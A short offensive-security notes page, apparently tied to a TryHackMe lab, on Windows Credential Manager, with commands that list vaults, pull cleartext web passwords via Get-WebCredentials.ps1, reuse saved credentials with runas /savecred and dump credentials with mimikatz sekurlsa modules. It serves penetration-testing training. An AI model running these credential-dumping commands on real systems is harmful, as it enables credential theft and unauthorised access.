Windows Credential Manager

Theory

Credential Manager is a Windows feature that stores logon-sensitive information for websites, applications, and networks. It contains login credentials such as usernames, passwords, and internet addresses. There are four credential categories:

Web credentials contain authentication details stored in Internet browsers or other applications.
Windows credentials contain Windows authentication details, such as NTLM or Kerberos.
Generic credentials contain basic authentication details, such as clear-text usernames and passwords.
Certificate-based credentials: Athunticated details based on certifications.

Practice

On Windows systems Vaultcmd & cmdkey can be used to list credentials.

# List vaults
C:\Users\Administrator> VaultCmd /list

# Extract and decrypt all master keys
sekurlsa::dpapi

# List property of a vault
C:\Users\Administrator> VaultCmd /listproperties:"Web Credentials"

# List creds in a vault
C:\Users\Administrator> VaultCmd /listcreds:"Web Credentials"

# List creds with cmdkey
C:\Users\Administrator> cmdkey /list

Vaultcmd can't show credentials. We have to use alternate methods such as Get-WebCredentials.ps1

# Get cleartext password
PS> Import-Module C:\Tools\Get-WebCredentials.ps1
PS> Get-WebCredentials

UserName  Resource             Password     Properties
--------  --------             --------     ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}

An alternative method of taking advantage of stored credentials is by using RunAs

# Runas with saved credential for "THM.red\thm-local"
C:\Users\Administrator> runas /savecred /user:THM.red\thm-local cmd.exe

# We also can use mimikatz to dump creds

mimikatz# privilege::debug
Privilege '20' OK

mimikatz# sekurlsa::credman

Resources

TryHackMe | Cyber Security TrainingTryHackMe

Last updated 9 months ago